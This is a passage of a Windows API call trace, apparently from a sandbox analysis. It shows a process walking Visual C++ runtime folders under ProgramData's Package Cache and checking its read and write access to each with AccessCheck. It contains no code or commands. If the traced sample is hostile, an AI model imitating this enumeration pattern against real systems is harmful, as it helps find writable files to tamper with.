lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.260] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.260] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.260] GetLastError () returned 0x7a [0106.260] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.260] GetLastError () returned 0x7a [0106.260] GetCurrentThread () returned 0xfffffffe [0106.260] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.260] GetCurrentProcess () returned 0xffffffff [0106.260] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.260] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.260] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.260] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.260] CloseHandle (hObject=0x344) returned 1 [0106.260] CloseHandle (hObject=0x33c) returned 1 [0106.260] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.260] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.260] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.261] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.261] GetLastError () returned 0x7a [0106.261] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.261] GetLastError () returned 0x7a [0106.261] GetCurrentThread () returned 0xfffffffe [0106.261] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.261] GetCurrentProcess () returned 0xffffffff [0106.261] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.261] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.261] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.261] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.261] CloseHandle (hObject=0x32c) returned 1 [0106.261] CloseHandle (hObject=0x344) returned 1 [0106.261] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.261] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.261] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.261] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.261] GetLastError () returned 0x7a [0106.261] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.261] GetLastError () returned 0x7a [0106.261] GetCurrentThread () returned 0xfffffffe [0106.261] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.261] GetCurrentProcess () returned 0xffffffff [0106.262] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.262] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.262] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.262] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.262] CloseHandle (hObject=0x340) returned 1 [0106.262] CloseHandle (hObject=0x32c) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.262] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.262] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.262] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.262] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.262] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.262] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.262] GetLastError () returned 0x7a [0106.262] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.262] GetLastError () returned 0x7a [0106.262] GetCurrentThread () returned 0xfffffffe [0106.262] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.262] GetCurrentProcess () returned 0xffffffff [0106.262] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.262] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.263] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.263] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.263] CloseHandle (hObject=0x344) returned 1 [0106.263] CloseHandle (hObject=0x33c) returned 1 [0106.263] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.263] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.263] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.263] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.263] GetLastError () returned 0x7a [0106.263] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.263] GetLastError () returned 0x7a [0106.263] GetCurrentThread () returned 0xfffffffe [0106.263] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.263] GetCurrentProcess () returned 0xffffffff [0106.263] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.263] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.263] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.263] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.263] CloseHandle (hObject=0x32c) returned 1 [0106.263] CloseHandle (hObject=0x344) returned 1 [0106.263] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.263] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.264] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.264] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.265] GetLastError () returned 0x7a [0106.265] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.265] GetLastError () returned 0x7a [0106.265] GetCurrentThread () returned 0xfffffffe [0106.265] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.265] GetCurrentProcess () returned 0xffffffff [0106.265] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.265] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.265] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.265] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.265] CloseHandle (hObject=0x340) returned 1 [0106.265] CloseHandle (hObject=0x32c) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.265] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.265] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.265] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.265] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.265] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.265] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.265] GetLastError () returned 0x7a [0106.265] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.266] GetLastError () returned 0x7a [0106.266] GetCurrentThread () returned 0xfffffffe [0106.266] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.266] GetCurrentProcess () returned 0xffffffff [0106.266] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.266] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.266] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.266] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.266] CloseHandle (hObject=0x344) returned 1 [0106.266] CloseHandle (hObject=0x33c) returned 1 [0106.266] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.266] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.266] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.266] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.266] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.266] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.266] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.266] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.266] GetLastError () returned 0x7a [0106.266] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.266] GetLastError () returned 0x7a [0106.266] GetCurrentThread () returned 0xfffffffe [0106.266] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.266] GetCurrentProcess () returned 0xffffffff [0106.266] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.266] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.267] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.267] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.267] CloseHandle (hObject=0x344) returned 1 [0106.267] CloseHandle (hObject=0x33c) returned 1 [0106.267] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.267] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.267] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.267] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.267] GetLastError () returned 0x7a [0106.267] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x57f730, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x57f730, lpnLengthNeeded=0x281b560) returned 1 [0106.267] GetLastError () returned 0x7a [0106.267] GetCurrentThread () returned 0xfffffffe [0106.267] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.267] GetCurrentProcess () returned 0xffffffff [0106.267] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.267] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.267] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.267] AccessCheck (in: pSecurityDescriptor=0x57f730, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.267] CloseHandle (hObject=0x32c) returned 1 [0106.267] CloseHandle (hObject=0x344) returned 1 [0106.267] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.267] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.267] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.268] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.268] GetLastError () returned 0x7a [0106.268] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x57f858, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x57f858, lpnLengthNeeded=0x281afc8) returned 1 [0106.268] GetLastError () returned 0x7a [0106.268] GetCurrentThread () returned 0xfffffffe [0106.268] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.268] GetCurrentProcess () returned 0xffffffff [0106.268] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.268] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.268] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.268] AccessCheck (in: pSecurityDescriptor=0x57f858, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.268] CloseHandle (hObject=0x340) returned 1 [0106.268] CloseHandle (hObject=0x32c) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.268] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.268] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.268] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.268] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.268] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.269] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package 